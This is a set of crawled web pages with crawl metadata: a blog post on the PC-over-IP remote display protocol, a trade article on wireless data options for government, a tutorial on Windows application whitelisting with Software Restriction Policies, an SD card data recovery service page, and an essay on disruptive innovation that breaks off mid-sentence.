A key aspect of Desktop and Presentation Virtualization is the Remote Presentation Protocol. The remote presentation protocol is the transport medium that connects the server, on which applications actually run, and the client, which presents their user interface, and with which the user interacts. Through the remote presentation protocol information from a session running on the server, such as display updates, sound and print jobs, is transmitted to the client over a network. The client, in turn, transmits user interactions, such as key strokes and mouse movements, back to the server for processing. The remote presentation protocol must operate in such a way that applications need not be modified in order to support this separation of processing and user interface. Likewise, users should also be unaware of this separation – from the users’ perspective the remote desktops and applications should behave as if they were running locally on the client device. There are several common remote presentation protocols, such as RDP, ICA and VNC, and many cases these protocols satisfy the requirements for remote access. But there are various situations in which they are currently not appropriate because they cannot provide sufficient performance so that applications running remotely behave like local applications. Common examples of scenarios where these protocols are insufficient include multi-media, e.g. streaming video, voice-over-IP, and 3D applications such as CAD or video games. In some cases these limitations can be circumvented, for example, by redirecting video streams directly to the client. However these workarounds don’t always work, for example in the event of a new video player or codec, or they may alter application behavior and the user experience. This is where PC-over-IPTM comes in. So what is PC-over-IP (PCoIP)? It is a new type of remote presentation protocol developed by Teradici that delivers true PC experience from a server, over an IP network, to a client device. This means full fidelity audio and video, with support for 3D graphic, and also support for local peripherals such as USB devices and printers. PC-over-IP utilizes dedicated chipsets on the server (Host) and client (Portal) to achieve: Ericom and Teradici have partnered to deliver the benefits of PC-over-IP. Ericom PowerTerm WebConnect provides the mandatory PCoIP Boker functionality that assigns clients to the appropriate hosts, provides centralized management, and access rights control. Another feature provided by Ericom PowerTerm WebConnect is the ability to connect to Teradici hosts from clients that are not Teradici enabled using RDP. I’ve written a blog post about PCoIP brokering capabilities provided by PowerTerm WebConnect, and I’ve also posted a video which demonstrates this functionality. You can also find information about this on the Ericom website.
<urn:uuid:a10550cf-4f21-47b8-919e-be86715b68c8>
CC-MAIN-2017-04
https://www.ericom.com/communities/blog/introducing-pc-over-ip
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280730.27/warc/CC-MAIN-20170116095120-00576-ip-10-171-10-70.ec2.internal.warc.gz
en
0.931598
580
2.53125
3
Wireless technology has exploded in the last several years, and it provides an expanding array of technology choices. Wireless technology refers to the transmission and receipt of information (voice, fax, data) using radio frequency (RF) energy. It can be point-to-point, analogous to telephone or leased-circuit connections, or broadcast, such as commercial television and radio. However, not all commercial wireless technologies are for government users, and a few are only now becoming viable in this regard. For both voice and data, wireless networks are merely an extension of wired networks from the user perspective. Within the context of government users and applications, what follows are several of the most pervasive and applicable wireless technologies available today and a brief glimpse at some promising technologies for tomorrow. Specialized Mobile Radio (SMR) The Federal Communications Commission (FCC) established specialized mobile radio (SMR) services in the mid-1970s by allocating a portion of the 800MHz frequency band for private land mobile-radio systems. SMR networks are operated by commercial system providers. Types of services provided include voice radio networks (including dispatch service), mobile packet data networks, and telephone and paging services. Initially developed around interstate highways and population centers, some of these networks have extended their service to include outlying areas. The main differentiators for SMR networks are transmission speed, transmission protocols, coverage areas and cost. SMRs specializing in data communications typically use a packet-switching protocol. Data is segmented and routed in discrete data envelopes called "packets," each with its own control information for routing, sequencing and error checking. Packet switching allows a communications channel to be shared by multiple users, each using the circuit only for the time required to transmit a single packet. Users are able to maintain a continuous connection to the network without permanently tying up a channel. Some advantages and disadvantages of SMR systems are summarized below: Specialized Mobile Radio * Cellular-style roaming through out coverage area * Easy access to public switched telephone network *Supports short, frequent messages well (e.g., data inquiries, text mes-sages) *Services designed specifically for data *Coverage lacking in less-populated areas *Priority access to regular telephone networks not available for government users *Potentially significant ongoing costs for usage fees *Does not support sustained data transfers well (e.g., long reports, images) Today, over 80 percent of the customers who subscribe to SMR services are in the construction, service or transportation industries. However, over the last 10 years, SMR network providers have increased their marketing efforts to public agencies. Spread spectrum is a modulation technique that takes an input signal, mixes it with frequency modulated (FM) noise and "spreads" the signal over a broad frequency range. The signal then hops from frequency to frequency at defined intervals, resulting in the spread signal having greater bandwidth than the original message. Spread-spectrum receivers have unique user codes to recognize, acquire and "de-spread" a spread signal, thus returning the signal to the original message. Popularly available spread-spectrum data networks use a mesh topology of shoebox-size radio transceivers (microcell radios), which are mounted to streetlights or utility poles. These microcells are strategically placed every quarter- to half-mile in a checkerboard pattern. Each microcell radio employs multiple-frequency-hopping channels and uses a randomly selected hopping sequence. Frequency hopping allows for a very secure network. These types of networks use digital-packet-switched protocols similar to that employed by SMRs. Microcells transmit messages to wired access points (WAPs). WAPs convert the data packets into a format for transmission to a wired Internet protocol network backbone. Each WAP and the microcells that report to it can support thousands of subscribers. The major spread-spectrum data provider is Metricom. Its system transmits data at a raw speed of 100 kilobits per second (Kbps), with a throughput averaging 28.8Kbps. Planned system upgrades will increase throughput up to 40Kbps using existing radio modems. Metricom also plans to offer service with throughput up to 128Kbps This service will use spectrum in the 2.3GHz range and will require a radio modem upgrade. Some advantages and disadvantages of spread-spectrum systems are summarized below: Spread Spectrum Systems * High bandwidth * Secure communications * Low initial cost * Easy for provider to expand coverage * Limited availability for wide area * Must be quasi-stationary to use * Recurring monthly costs By most estimates, more than 90 percent of traffic on the U.S. cellular telephone network is voice, but data transmissions are increasing rapidly. In 1995, there were approximately 1 million wireless-data users, with the market projected to grow to nearly 10 million users by the year 2000. While its popularity and coverage has expanded since Advanced Mobile Phone Service (AMPS) was introduced in the 1960s, analog cellular radio is still the base technology used for cellular service today. There are currently two methods for sending data over cellular networks: cellular digital packet data (CDPD) and cellular switched-circuit data (CSCD). Each has distinct advantages depending on the type of application, amount of data to send or receive, and geographic coverage needs. CDPD is currently available to roughly 50 percent of the population base. Two methods to transmit data are used, depending upon the service provider's network architecture. Some providers have radio channels dedicated to data transmission installed at existing voice cellular sites. Others use voice cellular channels and interleave data messages within the unused portion of voice radio signals. To use a CDPD data service, users require a laptop computer, a connector cable and a CDPD radio modem. Radio modems come in a PC-card format or connect to the user device with a serial cable. Regardless of the method used, messages are broken up into discrete packets of data and transmitted continuously over the network. Messages are then "reassembled" into the original message at the receiving device. This technology supports roaming and is especially attractive for multicast (e.g., one-to-many) service, allowing updates to be periodically broadcast to all users. Users log on once per day to register on the network. Messages and transmissions automatically locate them. CDPD supports TCP/IP and is most appropriate for short bursts of data, such as e-mail, credit-card authorization or database queries. Currently, CDPD provides data rates of 19.2Kbps with throughput averaging 14.4Kbps. Next-generation systems will allow data rates Nationwide, approximately 45 percent of CDPD agencies are in public safety. Many of these users are using the service as an adjunct to their existing private mobile-data systems. Typical applications include database inquiry, automated field reporting and unit-to-unit messaging. Although there are only limited examples of use in public safety, CDPD does provide the capability for electronic dispatch of units. Major CDPD providers generally have roaming agreements to allow users to access the service when outside their home coverage area. Some advantages and disadvantages of CDPD systems are summarized below: Cellular Digital Packet Data * Supports short, frequent messages well * Inexpensive end-user equipment * Available today * Protocol provides easy access to the Internet * Transparent roaming available * Moderate data rates (19.2Kbps) * Secure (data encryption provided by carrier) * Service in major population areas * System designed for data * Not yet fully deployed * Coverage not available in less-populated areas * Priority access not available for government users * Potentially significant ongoing costs * Newer technology * Does not support sustained data transfers well Cellular switched-circuit data is today's most popular and widely available option for wireless data transfer. It creates a dedicated connection or circuit over the analog cellular network only for the duration of the call, in contrast to the dedicated connection provided by a packet-switched network. Transfer rates are up to 14.4Kbps. Transferring data with CSCD requires a laptop computer, data-capable cellular telephone, a connector cable and a cellular modem (typically a PC card). As with voice service, charges are determined by the duration of calls, making CSCD cost-effective for larger data transmissions with file transfer, fax and e-mail applications. Cellular switched-circuit data is a good approach for session-based interactive transactions, such as logging onto a host application or accessing a private intranet. CSCD networks are low security but can be improved through user-provided encryption applications. CSCD is compatible with most off-the-shelf modem software. Since this service is available wherever analog cellular service is available, there is a variety of service providers. Some advantages and disadvantages of CSCD systems are summarized below: Cellular Switched-Circuit Data (CSCD) * Inexpensive and easy-to-use user devices * Transparent roaming * Service in major population areas (covers 90 percent to 95 percent of population base) * Supports sustained data transfers well * Voice and data capabilities * Extensive applications software * Good developer support *Dial-up connection required for each data message *Does not support short, frequent messages well *Priority access not available to government users *Potentially significant ongoing costs *Reliability (transmissions can drop when moving between calls) *Roaming can be expensive *Security (data encryption is an add-on) Personal Communications Systems Personal communications systems (PCS) are the next generation of terrestrial-based commercial wireless communications, providing inexpensive voice and data services. PCS include a broad range of telecommunications services intended to provide subscribers with enhanced features and wireless access to the public switched network. "One person, one number" has become the familiar motto of PCS in recent years. The Personal Communications Indu-stry Association predicts that there will be more than 167 million subscribers to PCS services by 2003. To accommodate this expected demand, the FCC has allocated both narrowband (901-902MHz, 930-931MHz, 940-941MHz) and broadband (1850-1990MHz) frequency spectra for PCS services. Blocks of spectra were auctioned by the FCC between 1995 and 1997. PCS design is similar to cellular design, but PCS use all-digital technology. PCS systems use a large number of low-power transmission sites to support high levels of data throughput. Examples of enhanced services available from PCS providers include voice mail; call hold, forwarding, waiting, and three-way calling; paging; text messaging; distinctive ringing; fraud control (through authentication and encryption); and better reception than analog cellular within the coverage area. Current data communication capability is provided via a dial-up connection, similar to switched-circuit cellular. The jury is still out regarding the effectiveness of PCS for wide-area use. While existing PCS services rely on cellular-type architectures, combinations of PCS services with satellite and other technologies may provide a greater functionality in the future. However, since providers of PCS services have designed their systems using competing technologies, wide-area roaming may be difficult. Some advantages and disadvantages of PCS are summarized below: Personal Communications Systems (PCS) * Telephone interconnect/easy access to Public Switched-Telephone Network (PSTN), or "regular" telephony * Support for high-volume data applications * Increased competition, lower prices * Difficult to eavesdrop * Advanced digital features * Low-weight, multipurpose, low-cost devices * System design allows for reduced power consumption, longer battery life *Low power requiring numerous sites for coverage (limited initial coverage) *Priority access not available for government users *Competing technologies inhibit roaming *Potentially high recurring costs Satellites function as radio repeaters in the sky. Radio signals are beamed to the satellite from an earth station via an uplink. At the satellite, the signal is filtered, converted and retransmitted via a downlink to ground-station or mobile receivers. Satellites can receive and retransmit thousands of signals simultaneously, from simple digital data to the most complex television programming. Satellite systems provide effective and ubiquitous mobile communications for users requiring a large coverage area (e.g., transportation, military, exploration, and maintenance). Recently, satellite companies have begun to show a higher level of interest in the public-sector market. Two main types of satellite systems offer communications services applicable to government users: geosynchronous earth orbit (GEO) and low earth orbit (LEO) satellites. Satellite system providers use both circuit-switched and packet-switched technologies. GEOs orbit the earth at an altitude of approximately 22,300 miles, traveling at the same angular speed as the earth rotates on its own axis. Thus, GEOs appear to remain "stationary" relative to a reference point on the earth. A single GEO can "see" approximately 40 percent of the Earth's surface. Three such satellites, spaced at equal intervals, can provide global coverage. Due to a GEO satellite's distance from Earth, reception of the repeated signal can be delayed as much as 12 to 25 milliseconds for each outbound and inbound transmission. Data throughput rates range from 4.8Kbps to 9.6Kbps. In addition, these large distances cause GEO transmissions to require more power than closer terrestrial or LEO communications. This requirement has made it difficult to produce convenient hand-held radios that are able to access GEO satellites. GEO service vendors have historically focused on video, data broadcasting and long-haul transportation industries. LEO satellites do not remain stationary above the Earth. They orbit 300 to 300-900 miles above the Earth's surface at speeds of 16,500 miles per hour. A LEO system is made up of satellites all traveling at the same speed and the same altitude. Satellites are positioned relative to each other such that each covers a portion of the Earth's surface. When the satellites travel around the world, their coverage area moves with them. As one satellite starts to leave a certain geographic area, it "hands off" communications to the next satellite as it enters the area, maintaining continuous coverage. A network control system interconnects the LEO satellites and links individual satellites. Since LEOs are closer to the Earth's surface, less power is required to send a message to them. User devices can be smaller and less sophisticated than those designed for use with GEO systems. Significant efforts are currently under way to develop new LEO systems, with the earliest service anticipated for later this year. LEO vendors include: * Globalstar -- A joint effort between Loral and Qualcomm, offering narrowband, dual-mode telephones with paging, low-speed data and position-location services. * ECCO -- Designed by Constellation Communications, ECCO will offer narrowband, dual-mode telephones with paging, low-speed data and fax services. * Iridium -- This LEO service provider is from Motorola. Iridium will offer narrowband, dual-mode telephones with paging, low-speed data, and fax *Teledesic -- Co-founded by Microsoft's Bill Gates and Craig McCaw of McCaw Communications. It will offer broadband multimedia, videoconferencing and Internet services. The tables below summarize some of the advantages and disadvantages of geosynchronous and low earth orbit satellites: Geosynchronous Earth Orbit (GEO) Satellites *Access to PSTN *Many advanced digital features *Accessibility from remote areas *Ability to support voice and data *Reduced coverage in "urban canyons"/line-of-sight *Limited range of user equipment *Low data-transmission rates *High user equipment costs *High, recurring costs *Significant propagation delay *Single point of failure *Unproven for public safety and local government use Low Earth Orbit (LEO) Satellites *Advanced digital features *Little propagation delay *Access to PSTN *Ability to support voice and data *Entire system must be in place before operable *Requires enormous infrastructure *Limited range of user equipment *Unproven; features and capabilities unclear *Potentially high recurring and equipment costs Evaluating wireless technology can be complicated and time-consuming. However, focusing on users' functional needs can enable more effective comparison of alternatives. Some specific areas to consider for wireless technology include: * Application Integration -- Does the technology allow a smooth interface with current and planned applications? Would it facilitate software modifications if changes in system protocol or operational requirements occur? * Performance -- Software and hardware components of the network must be responsive to user needs. Sensitivity to loading requirements, peak user demand and the ability to transfer information in the time frame required are critical parameters. * Availability/Reliability -- On an annual basis, what is the percentage of time that the network is available for processing user requests? How does the availability change during emergencies or other periods of peak usage? * Security -- Careful consideration must be given to the ability of system managers to control access to and use of the network on a user-by-user basis * User Interface/Device -- The types of devices available for use on the network, their functionality -- including features, indications, ergonomic capabilities, vendor sources, etc. -- should be compared to end-user requirements. * Coverage -- The percentage of the service area over which the network can be used, usually defined by geographic areas with associated reliabilities for accessing the system. How does the coverage area compare to user-defined operating areas? Gregory Walker is a senior consultant with The Warner Group, a Woodland Hills, Calif.-based management consulting firm specializing in the public sector. He has significant experience evaluating wireless voice and data systems and can be reached at (818) 710-8855. November Table of Contents
<urn:uuid:68c2e6fa-b94e-4903-b0b5-cd31e2a30793>
CC-MAIN-2017-04
http://www.govtech.com/featured/Governments-Surfing-the-Wireless-Wave.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560285244.23/warc/CC-MAIN-20170116095125-00052-ip-10-171-10-70.ec2.internal.warc.gz
en
0.899752
3,791
3.265625
3
In Windows it is possible to configure two different methods that determine whether an application should be allowed to run. The first method, known as blacklisting, is when you allow all applications to run by default except for those you specifically do not allow. The other, and more secure, method is called whitelisting, which blocks every application from running by default, except for those you explicitly allow. With the wide distribution of computer ransomware and other malware infections and the high costs of recovering from them, a very strong computer protection method is whitelisting. This allows you to block all programs by default and then setup rules that specifically allow only certain programs to run. Though easy to setup initially, whitelisting can be burdensome as you will need to add new rules every time you install a new program or want to allow a program to run. Personally, I feel if you are willing to put the time and effort into using whitelisting, the chances of a computer infection damaging your computer becomes minimal. This tutorial will walk you through setting up whitelisting using Software Restriction Policies so that only specified applications are able to run on your computer. Though this guide will be geared towards individual users, this same approach can be used in the enterprise by pushing these policies to a Windows domain. To get started white listing your applications you need to open the Security Policy Editor, which configures the Local Security Policies for the machine. To do this, click on the Start button and then type secpol.msc into the search field as shown below. When secpol.msc appears in the search list, click on it to start the Local Security Policy editor. You should now see the Local Security Policy editor as shown below. To begin creating our application whitelist, click on the Software Restriction Policies category. If you have never created a software restriction policy in the past, you will see a screen similar to the one below. To create the new policy, right click on the Software Restriction Policies category and select the New Software Restriction Policies option as shown below. A new Software Restriction Policy will now be created as shown below. The first thing you need to do is configure the Enforcement section. This section allows us to specify general settings on how these restriction policies will be configured. To get started, click on the Enforcement object type as indicated by the blue arrow above. I suggest that you leave the settings like they are for now. This allows you to create a strong policy, without the issues the may be caused by blocking DLLs. When you are done configuring these settings, click on the OK button. You will now be back at the main Software Restriction Policies window as shown in Figure 5. We now want to configure what file types will be considered an executable and thus blocked. To do this click on the Designated File Types object. This will open the properties window for the designated file types that will be considered as an executable and therefore blocked by the software restriction policy that you are creating. Unfortunately, the above the list is not as exhaustive as you would like and includes an extension that should be removed. First, scroll through the above list of file extensions and remove the LNK extension from the list. To remove the extension, left-click on it once and then click on the Remove button. If you do not remove this extension, then all shortcuts will fail to work after you create our whitelist. Now you want to add some extra extensions that are known to be used to install malware and ransomware. To add an extension, simply add it to the File Extension field and click on the Add button. When adding an extension, do not include the period. For example, to exclude powershell scripts, you would enter PS1 into the field and click on the Add button. Please add the following extensions to the designated file types: |Extensions to add to the File Type List| When you are done adding the above extensions, click on the Apply button and then the OK button. We will now be back at the main Software Restrictions Policy section as shown in Figure 8 below. At this point, you need to configure the default policy that decides whether the file types configured in figure 7 will be automatically blocked or allowed to run. To do this, click on the Security Levels option as indicated by the blue arrow below. When you double-click on the Security Levels category, you will be brought to the screen below that has three security levels you can apply to your software restriction policies. In order to select which level should be used, you need to double-click on the particular level and set it as the default. Below are the descriptions for each type of security level. Disallowed: All programs, other than those you allow by the rules you will configure, will not be allowed to run regardless of the access rights of the user. Basic User: All programs should execute as a normal users rather than as an Administrator. Unrestricted: All programs can be run as normal. Since you want to block all applications except those that you white list, you want to double-click on the Disallowed button to enter its properties screen as shown below. In the above properties screen, to make it so all applications will now be blocked by default, please click on the Set as Default button. Then click on the Apply and OK buttons to exit the properties screen. We will now be back at the Security Levels list and almost every program will now be blocked from executing. For example, if you try to run Internet Explorer, you will receive a message stating that "This program is blocked by group policy." as shown below. Now that you have configured Windows to block all applications from running, you need to configure rules that allow your legitimate applications to run. The next section will explain how to create path rules so that the applications you wish to allow to run are whitelisted. If you followed the previous steps, Software Restriction Policies are now enabled and blocking all executables except those located under C:\Program Files and C:\Windows. Those two directories are automatically whitelisted by two default rules that are created when you setup Software Restriction Policies. Obviously, in order to have a properly working machine you need to now allow, or whitelist, other applications. To do this, you need to create additional rules for each folder or application you wish to allow to run. In this tutorial, we are going to add a new Path Rule for the C:\Program Files (x86) folder as that needs to also be whitelisted for 64-bit versions of Windows. While in the Local Security Policy editor, click on the Additional Rules category under Software Restriction Policies as shown below. As you can see from above, there are already two default rules configured to allow programs running under C:\Windows and C:\Program Files to run. If you are running a 64 bit version of Windows you now want to add a further rule that will allow programs under the C:\Program Files (x86) folder to run as well. To do this, right-click on an empty portion of the right pane and click on New Path Rule... as shown below. This will open up the New Path Rule Properties dialog as shown below. As you want to create a path rule for C:\Program Files (x86), you should enter that path into the Path: field. Then make sure the Security Level is set to Unrestricted, which means the programs in it are allowed to run. If you wish, you can enter a short description explaining what this rule is for in the Description field. When you are finished, the new rule should look like the one below. When you are ready to add this rule, click on the Apply and then OK button to make that rule active. You will now be back at the Rules page and the new C:\Program Files (x86) rule will be listed and programs located in that folder will now be allowed to run. You now need to make new rules for other programs that you wish to allow to run in Windows. For example, if you play games with Steam, you should follow the steps above to add an unrestricted rule for the C:\Program Files\Steam\ folder. In the next two sections, I have provided tips and and other types of rules that can be created to whitelist programs. I suggest you read it to take advantage of the full power of Software Restriction Policies. As always, if you need help with this process, please do not hesitate to ask in our tech support forums. When adding a path rule that is a folder, it is important to note that any subfolder will also be included in this path rule. That means if you have applications stored in C:\MyApps and create a path rule that folder specifies that folder is unrestricted, then all subfolders will be allowed to run as well. So not only will C:\MyApps\myapp.exe be allowed to run, but also C:\MyApps\games\gameapp.exe is allowed to execute as well. To make it easier when creating rules, it is also possible to use wild cards to help you specify what programs should be allowed to run. When using wild cards, you can use a question mark (?) to denote a single wildcard character and a asterisk (*) to denote a series of wildcard characters. For example, if you have a folder of executables that you wish to whitelist, you can do so by using a wildcard path rule like this: C:\MyApps\*.exe. This rule would allow all files that end with .exe to execute, but not allow executables in subfolders to run. You can also use a path rule that specifies a single wildcard character like C:\MyApps\app?.exe. This rule would allow C:\MyApps\app6.exe to run, but not C:\MyApps\app7a.exe to run. It is also possible to use environment variables when creating path rules. For example, if you wish to allow a folder under all the user profiles, you can specify a rule like %UserProfile%\myfolder\*.exe. This would only allow executables under that particular folder to execute, but would expand %UserProfile% to the correct folder for whoever is logged into the computer. Last, but not least, if you wish to run executables from a network share, then you need specify the full UNC path in the rule. For example, \\Dev-server\Files. When creating rules, it is also possible to create other rules called Certificate Rules and Hash Rules. These rules are described below. Certificate Rule: A certificate rule is used to allow any executable to run that is signed by a specific security certificate. Hash Rule: A hash rule allows you to specify a file that can be run regardless of where it is located. This is done by selecting an executable when creating the rule and certain information will be retrieved by SRP and saved as part of the rule. If any other executables on the computer match the stored file hashed and information, it will be allowed to run. Note: Microsoft has stated that Certificate Rules could cause performance issues if used, so only use them if absolutely necessary. Many Spyware, Hijackers, and Dialers are installed in Internet Explorer through a Microsoft program called ActiveX. These activex programs are downloaded when you go to certain web sites and then they are run on your computer. These programs can do a variety of things such as provide legitimate services likes games or file viewers, but they can also be used to install Hijackers and Spyware on to ... This tutorial will walk you through recovering deleted, modified, or encrypted files using Shadow Volume Copies. This guide will outline using Windows Previous Versions and the program Shadow Explorer to restore files and folders as necessary. Notepad++ is a very powerful text and source code editor with a lot of features. Unfortunately, those features tend to require a lot of settings. This means that common settings, such as the displaying of line numbers, may not always be so easy to find. This tutorial will walk you through showing and hiding line numbers in the Notepad++ editor. When you install Windows, you are shown the Windows license agreement that provides all the legal language about what you can and cannot do with Windows and the responsibilities of Microsoft. Finding this license agreement, afterwards, is not as easy. This tutorial will explain how to find the license agreement for the edition of Windows installed on your computer. If you use a computer, read the newspaper, or watch the news, you will know about computer viruses or other malware. These are those malicious programs that once they infect your machine will start causing havoc on your computer. What many people do not know is that there are many different types of infections that are categorized in the general category of Malware.
<urn:uuid:3fb83028-797f-444b-ac21-3525269bb6a8>
CC-MAIN-2017-04
https://www.bleepingcomputer.com/tutorials/create-an-application-whitelist-policy-in-windows/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280364.67/warc/CC-MAIN-20170116095120-00357-ip-10-171-10-70.ec2.internal.warc.gz
en
0.921225
2,661
2.53125
3
Inside your phone, digital camera, GoPro, or other mobile device, you’re likely to find an SD card or a microSD card. These tiny packages can hold a deceptively large amount of data. As you use your phone or camera, your SD card can fill up with priceless pictures and videos. But SD cards can fail, just as any other storage device can. If you’ve lost data due to a failed flash memory card, our SD Card Recovery Service engineers can help. What Is an SD Card? In general, memory cards are thin, light data storage devices. Their particular form factor makes them ideal as removable storage for small devices. You can pop a memory card into your camera, take enough pictures to fill it up, and then pop the card out, empty out its contents, and slip it back in. An SD card might just look like one giant chip to a layperson, but the outside is actually a shell. Crack open the shell, and you’ll see something very similar to the inside of a typical USB flash drive. You will find one or more flash memory chips, along with a controller chip soldered to a printed circuit board. The NAND flash memory chip stores all of your data. When you plug your SD card into your computer, camera, or other device, data flows to and from the memory chip, organized and regulated by the controller chip. The controller keeps track of any bad blocks on the NAND chip as one of its many duties. What Is a microSD Card? The microSD card is the poster child for the huge strides data storage technology has taken over the decades. It is scarcely bigger than one of your fingernails, barely thicker than a sheet of paper, and yet it can store up to hundreds of gigabytes of data. If you could travel back in time to the 1950s and show the people at IBM the latest model of 256 GB microSD card, they’d probably laugh in your face. A microSD card is similar in design to a monolithic USB flash drive. All the components it needs—the NAND chip, the controller, and the interface—are soldered together into a deceptively small package. Some of the microSD card’s larger siblings take advantage of monolithic technology as well (leaving you with a lot of empty space inside the SD card’s casing). How do SD Cards Fail? Generally, SD cards and microSD cards are a bit less vulnerable to physical damage than USB flash drives. In many USB flash drives, the USB plug has a frail connection to the PCB that can easily be damaged. Since an SD card’s electrical contacts are built into the PCB, that is one less point of failure. Also, SD cards are usually tucked away very discretely in their devices, so it’s hard for them to be accidentally broken while in use. This SD card has a monolithic design. There is a hairline fracture running across it due to physical trauma. But while an SD card can survive a fall that would kill a hard disk drive, it might not fare so well if it gets stepped on, driven over, etc. This could crack the PCB, or even the NAND chip itself. A cracked NAND chip is roughly equivalent to a hard drive platter with rotational scoring: It’s toast. An SD card can also fail as a result of a power surge. It only takes a surge of three nanoseconds to short out a PCB. If an SD card is plugged into a device when power surge occurs, the PCB can be shorted out. This traps all of the data on the NAND chip with no way for anyone outside of an advanced data recovery lab to retrieve it. Logical failures in SD cards are more common than physical failures. Like most removable storage media, SD cards aren’t supposed to be removed while in use, or without being safely ejected. Removing an SD card without warning can result in file corruption or corruption of the partition table or boot sector. A corrupted boot sector or partition table will make an SD card appear to be blank. Files can also be deleted from an SD card, or the card can be accidentally reformatted. SD cards typically come out of the factory with FAT16 or FAT32 filesystems. Unlike proprietary Mac, Windows, and Linux systems, FAT filesystems play nicely with just about everyone. A user can reformat their SD card with any other filesystem. Different filesystems have different features, so messing with an SD card’s filesystem can provide some benefits. However, this can decrease the performance or lifespan of an SD card. Many of the controller chip’s error correction and wear leveling techniques are based on the assumption that the card is formatted with a FAT filesystem. Replacing the filesystem can lead an otherwise-healthy SD card to die before its time. The SD Card Recovery Process Since so many of the common ways SD cards fail are logical, SD card recovery tends to play by many of the same rules as logical recovery from other devices. Regardless of the differences between the underlying hardware, recovering data from an accidentally reformatted hard drive and SD card follows roughly the same process. Whenever you delete data from, accidentally reformat, or corrupt the boot sector of something, you are only making a small change to its filesystem. Deleting a file doesn’t automatically erase it, but rather marks the space taken up by it as “unused”. Reformatting does this on a larger scale, but can also partially or completely erase the old filesystem architecture. And it only takes a single corrupt sector to make an SD card seem to be blank. The inside of a damaged SD card. There is a visible crack in the PCB. Our SD card recovery service engineers were able to remove the NAND chip and extract its contents. Even though these changes are small, they have big consequences. It is the job of our SD card recovery service technicians to use our specialized data recovery tools and techniques and go where you cannot. We use HOMBRE, a proprietary software designed for and by our data recovery experts, to investigate these changes to the filesystem and salvage the data from your failed SD or microSD card. In the event that your SD card’s PCB is damaged, our engineers must gain direct access to the NAND chip and piece its contents back together, bypassing the failed PCB and controller. This can involve removing the NAND chip and connecting it to a chip reader, or in the case of microSD cards, soldering tiny wires to specific contact points on the device. Why Choose Gillware for My SD Card Recovery Services Needs? Our technicians are highly-skilled and well-trained in the fundamentals of the most cutting-edge flash memory technologies. Gillware’s suite of powerful proprietary tools for logical analysis and data recovery, combined with our skilled data recovery technicians, make us your best choice for failed SD card recovery services. Furthermore, here at Gillware Data Recovery, our entire SD card recovery process is financially risk-free. We even offer to cover the cost of inbound shipping, and the only time we ever show you a bill is after we’ve recovered everything we can from your failed SD card. There are no evaluation fees, and you only pay for our efforts if the data you need has been recovered. Ready to Have Gillware Assist You with Your SD Card Recovery Services Needs? Best-in-class engineering and software development staff Gillware employs a full time staff of electrical engineers, mechanical engineers, computer scientists and software developers to handle the most complex data recovery situations and data solutions Strategic partnerships with leading technology companies Gillware is proud to be a recommended provider for Dell, Western Digital and other major hardware and software vendors. These partnerships allow us to gain unique insight into recovering from these devices. RAID Array / NAS / SAN data recovery Using advanced engineering techniques, we can recover data from large capacity, enterprise grade storage devices such as RAID arrays, network attached storage (NAS) devices and storage area network (SAN) devices. Virtual machine data recovery Thanks to special engineering and programming efforts, Gillware is able to recover data from virtualized environments with a high degree of success. SOC 2 Type II audited Gillware has been security audited to ensure data safety, meaning all our facilities, networks, policies and practices have been independently reviewed and determined as completely secure. Facility and staff Gillware’s facilities meet the SOC 2 Type II audit requirements for security to prevent entry by unauthorized personnel. All staff are pre-screened, background checked and fully instructed in the security protocol of the company. We are a GSA contract holder. We meet the criteria to be approved for use by government agencies GSA Contract No.: GS-35F-0547W Our entire data recovery process can be handled to meet HIPAA requirements for encryption, transfer and protection of e-PHI. No obligation, no up-front fees, free inbound shipping and no-cost evaluations. Gillware’s data recovery process is 100% financially risk free. We only charge if the data you want is successfully recovered. Our pricing is 40-50% less than our competition. By using cutting edge engineering techniques, we are able to control costs and keep data recovery prices low. Instant online estimates. By providing us with some basic information about your case, we can give you an idea of how much it will cost before you proceed with the recovery. We only charge for successful data recovery efforts. We work with you to define clear data recovery goals for our technicians, and only charge you upon successfully meeting these goals and recovering the data that is most important to you. Gillware is trusted, reviewed and certified Gillware has the seal of approval from a number of different independent review organizations, including SOC 2 Type II audit status, so our customers can be sure they’re getting the best data recovery service possible. Gillware is a proud member of IDEMA and the Apple Consultants Network.
<urn:uuid:87eab5cc-b51c-42d6-aaa1-1ccc20c04e74>
CC-MAIN-2017-04
https://www.gillware.com/sd-card-recovery-service/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280364.67/warc/CC-MAIN-20170116095120-00357-ip-10-171-10-70.ec2.internal.warc.gz
en
0.926078
2,101
2.8125
3
A disruptive innovation can help create a new market and value network, or disrupt an existing market and value network by displacing an earlier technology. The term is used to describe innovations that improve a product or service in ways that the market does not expect; typically first by designing for a different set of consumers in a new market, and later, by lowering prices in the existing market. The theory of disruptive innovation was first coined by Harvard professor Clayton M. Christensen in his research on the disk-drive industry, and later popularized by his book, “The Innovator’s Dilemma”, published in 1997. A classic example is the personal computer. Prior to its introduction, mainframes and minicomputers were the prevailing products in the computing industry. Apple, one of the pioneers in personal computing, began selling its early computers in the late 1970s and early 1980s—but as a toy for children. Gradually, the innovation improved. Within a few years, the smaller, more affordable personal computer became good enough to do the work that previously required minicomputers. This created a huge new market and ultimately eliminated the existing industry. Most recently, in the Internet of Things, Belkins WeMo has been disrupting the space with a range of simple-to-use attachments that allow consumers to program basic behaviors (e.g., on/off) for their electrical devices. Belkin has been improving and expanding on a winning formula, which includes giving its customers access to a visual interface to create “If This, Then That” recipes for controlling their home devices. Now WeMo is offering the WeMo Maker kit, which can be used to convert many electrical devices powered by DC transformers into programmable appliances. There are many more disruptive innovations that are changing the world as we see and experience it. Some of the interesting ones are: Autonomous Vehicles: The continued evolution of fully self-driving or “autonomous” vehicles. Their arrival is now just a matter of time, but is expected to transform the transportation industry. The technology and cost for autonomous vehicles are almost ready for the mass market with the real hold-up being the regulators, who barely know how to begin rethinking a hundred years of safety, insurance, and traffic laws. Health and Fitness – The Quantified Self: There are numerous new applications that collect, report, and respond to information from a user’s own body - a trend that is sometimes referred to as “the quantified self.” These include devices for health and improved fitness training. There are separate categories for seniors, people with disabilities, kids, and athletes - again using much of the same technology. Manufacturing – 3D Printing and Robotics: 3D printing pioneer MakerBot announced the availability of filaments (the basic plastic media used by the printers) that have integrated real-world materials including iron, bronze, maple and limestone. Printing objects with these new media can produce much more realistic looking output, moving the technology closer to printing 